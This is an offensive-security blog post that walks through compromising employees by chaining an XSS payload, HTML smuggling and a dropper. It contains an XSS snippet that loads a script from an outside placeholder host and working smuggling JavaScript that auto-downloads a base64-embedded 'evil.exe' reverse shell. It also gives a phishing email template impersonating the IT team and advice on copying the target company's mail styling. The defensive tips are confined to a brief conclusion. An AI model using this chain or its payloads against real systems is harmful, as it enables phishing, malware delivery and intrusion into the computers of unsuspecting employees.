Initial Access with XSS and HTML Smuggling – Theory

Hi there! In this blog, we will discuss how to compromise an employee system with some tricks. We will cover a client-side attack and some chaining of techniques like phishing, HTML Smuggling, Droppers, etc. I couldn’t develop the demo lab but I will asap with developing a dropper with C# or C/C++.

IC2021 UK – Update – Intercamp e.V.

Firstly, I want to explain the scenario. Our target has a website without authentication which employees can download the software updates.

Our found website has an XSS Vulnerability and we want to compromise this target.

We can start the enumeration and hunting mails but our first goal isn’t that. I will jump the enumeration and vuln assessment phases.

The employee must download and execute our malware and software updater. If our malware will crash or the updater doesn’t execute, these ones may attract attention. Our javascript code downloads our dropper and our dropper must download and execute both of the malware and updater.

XSS Script (Import the outsource js and call the function)

<script src="hxxp://domain:port/smuggle.js"></script>
<img src="x" onerror=" base64ToArrayBuffer()">

HTML Smuggling Code (https://github.com/SofianeHamlaoui/Pentest-Notes/blob/master/offensive-security/defense-evasion/file-smuggling-with-html-and-javascript.md)

When we create the malware; encode with base64 and copy the encoded malware into the file variable.

base64 malw.exe > b64_malw.txt

Smuggle.js :

function base64ToArrayBuffer(base64) {
            var binary_string = window.atob(base64);
            var len = binary_string.length;
            
            var bytes = new Uint8Array( len );
                for (var i = 0; i < len; i++) { bytes[i] = binary_string.charCodeAt(i); }
                return bytes.buffer;
            }

            // 32bit simple reverse shell
            var file = ''; //Base64 version of malware
            var data = base64ToArrayBuffer(file);
            var blob = new Blob([data], {type: 'octet/stream'});
            var fileName = 'evil.exe';

            if (window.navigator.msSaveOrOpenBlob) {
                window.navigator.msSaveOrOpenBlob(blob,fileName);
            } else {
                var a = document.createElement('a');
                console.log(a);
                document.body.appendChild(a);
                a.style = 'display: none';
                var url = window.URL.createObjectURL(blob);
                a.href = url;
                a.download = fileName;
                a.click();
                window.URL.revokeObjectURL(url);
            }
Script Based Malware: A New Attacker Trend on Internet Explorer

You can basically create your own dropper with a batch script or Powershell like downloading exes with GitHub. In this phase, you can obfuscate the MSF payload, add some injection techniques, etc. After this post, we will discuss how to obfuscate and evade our malware.

For Simple Dropper: https://github.com/tww-software/powershell-dropper-POC

After the creation of the dropper, you must encode this with base64 and copy it to the file variable.

The first side of the attack is done, now we will create a mail template and send it to the target mails. While developing the mails, we should know the mail template of the company if applicable, or you can find any provider, partner company with a mail news teller -> you can find a mail template for the target. When we did this, our template will be more reliable. And don’t forget, our mail’s goal must be for updating the systems. If you want to change the colors or keywords in the mail template you can take a look at the https://bksecurity.org/social-engineering-phishing-fake-messages-and-more/ post.

Example Template:

<from> it@hckr.com
<to> target
Hi Everyone,
There is an important update for the XYZ software.
You must update your computer software as soon as possible.
Please go to the link for the update process:
<Company Software Update Link>

IT Team

There is an update and the link is not malicious for the users because this is the company’s real update link but with some differences. When the employee clicks the link on the upper side, our javascript code triggers the smuggling code and the dropper has been downloaded by the user. If the user executes dropper firstly this will download the malware and real update, later that executes both of them and remove the malware. Our malware -> Runs on the memory 🙂

The process is shown in the picture.

Conclusion

  • Use authentication and authorization for the public systems, If possible, you must hide these types of systems from non-employee people.
  • Take a look at the sender of the mails in detail.
  • If the system is vulnerable and you can not change the source code; you can use IP whitelisting for preventing access to the bad guys. Otherwise, fix the XSS.
  • Don’t execute everything especially like bat, ps1, document macros, etc. If you don’t know the extension or you think the mail is suspicious, please talk to your IT or Security Team.
  • If you clicked and there is suspicious activities on your computer, please contact the IT and Security Teams and start the IR Process.